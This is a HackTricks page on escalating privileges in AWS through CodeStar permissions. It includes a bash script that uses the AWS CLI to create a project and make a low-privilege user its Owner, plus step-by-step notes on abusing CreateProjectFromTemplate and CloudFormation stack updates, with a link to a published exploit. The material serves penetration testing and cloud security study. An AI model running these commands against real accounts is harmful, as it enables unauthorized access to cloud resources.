AWS - Codestar Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Codestar

You can find more information about codestar in:

pagecodestar:CreateProject, codestar:AssociateTeamMember

`iam:PassRole`, `codestar:CreateProject`

With these permissions you can abuse a codestar IAM Role to perform arbitrary actions through a cloudformation template. Check the following page:

pageiam:PassRole, codestar:CreateProject

`codestar:CreateProject`, `codestar:AssociateTeamMember`

This technique uses codestar:CreateProject to create a codestar project, and codestar:AssociateTeamMember to make an IAM user the owner of a new CodeStar project, which will grant them a new policy with a few extra permissions.

PROJECT_NAME="supercodestar"

aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
    --name $PROJECT_NAME \
    --id $PROJECT_NAME 

echo "Waiting 1min to start the project"
sleep 60

USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')

aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
    --project-id $PROJECT_NAME \
    --user-arn "$USER_ARN" \
    --project-role "Owner" \
    --remote-access-allowed

If you are already a member of the project you can use the permission codestar:UpdateTeamMember to update your role to owner instead of codestar:AssociateTeamMember

Potential Impact: Privesc to the codestar policy generated. You can find an example of that policy in:

pagecodestar:CreateProject, codestar:AssociateTeamMember

`codestar:CreateProjectFromTemplate`

Create a New Project:
- Utilize the codestar:CreateProjectFromTemplate action to initiate the creation of a new project.
  - Upon successful creation, access is automatically granted for cloudformation:UpdateStack.
  - This access specifically targets a stack associated with the CodeStarWorker-<generic project name>-CloudFormation IAM role.
Update the Target Stack:
- With the granted CloudFormation permissions, proceed to update the specified stack.
  - The stack's name will typically conform to one of two patterns:
    awscodestar-<generic project name>-infrastructure
    awscodestar-<generic project name>-lambda
    The exact name depends on the chosen template (referencing the example exploit script).
Access and Permissions:
- Post-update, you obtain the capabilities assigned to the CloudFormation IAM role linked with the stack.
- Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further.

For more information check the original research: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/. You can find the exploit in https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py

Potential Impact: Privesc to cloudformation IAM role.

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Codepipeline Privesc Nextcodestar:CreateProject, codestar:AssociateTeamMember

Last updated 2 months ago